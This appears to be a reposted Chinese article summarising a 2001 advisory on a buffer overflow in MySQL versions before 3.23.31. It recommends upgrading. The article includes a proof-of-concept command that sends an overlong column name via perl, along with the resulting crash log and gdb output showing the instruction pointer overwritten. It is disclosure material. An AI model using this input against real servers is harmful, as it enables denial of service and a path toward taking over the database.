MySQL3.23.31之前版本的安全漏洞

2024-07-24 12:55:20

字體：大中小

來源：轉載

供稿：網(wǎng)友

所有小于 3.23.31 版本的 mysql 都存在一個緩沖溢出漏洞導致mysql 崩潰。使攻擊者獲得 mysqld 權限，而可以操縱所有數(shù)據(jù)庫。攻擊的前提是必須有一個合法的登錄名和口令。

下面為最初發(fā)表于 mysql 郵件列表的信件摘要。

==================================================

漏洞是由jo?o gouveia 于1月12日發(fā)現(xiàn)的：

步驟：

在第一個終端上啟動 mysql：

spike:/var/mysql # /sbin/init.d/mysql start

在另外一個終端上輸入：

[email protected]:~ > mysql -p -e ’select a.’`perl -e’printf("a"x130)’`’.b’

enter password:

(沒有反應？按^c退出)

在第一臺終端上會顯示：

spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 segmentation fault

nohup

$ledir/mysqld --basedir=$my_basedir_version --datadir=$datadir --skip-lockin

g "$@" >>$err_log 2>&1>

number of processes running now: 0

mysqld restarted on fri jan 12 07:10:54 wet 2001

mysqld daemon ended

使用 gdb 顯示結果如下：

(gdb) run

starting program: /usr/sbin/mysqld

[new thread 16897 (manager thread)]

[new thread 16891 (initial thread)]

[new thread 16898]

/usr/sbin/mysqld: ready for connections

[new thread 16916]

[switching to thread 16916]

program received signal sigsegv, segmentation fault.

0x41414141 in ?? ()

(gdb) info all-registers

eax 0x1 1

ecx 0x68 104

edx 0x8166947 135686471

ebx 0x41414141 1094795585

esp 0xbf5ff408 0xbf5ff408

ebp 0x41414141 0x41414141

esi 0x41414141 1094795585

edi 0x0 0

eip 0x41414141 0x41414141

eflags 0x10246 66118

cs 0x23 35

ss 0x2b 43

ds 0x2b 43

es 0x2b 43

fs 0x0 0

gs 0x0 0

其中的 eip 指示就是緩沖溢出了。

解決辦法就是升級到 3.23.31。所以，各位如果還沒有把數(shù)據(jù)庫升級到最新版本，請趕快行動。

上一篇：MySQL安全問題(匿名用戶)的一點心得

下一篇：MySQL安全性指南(2)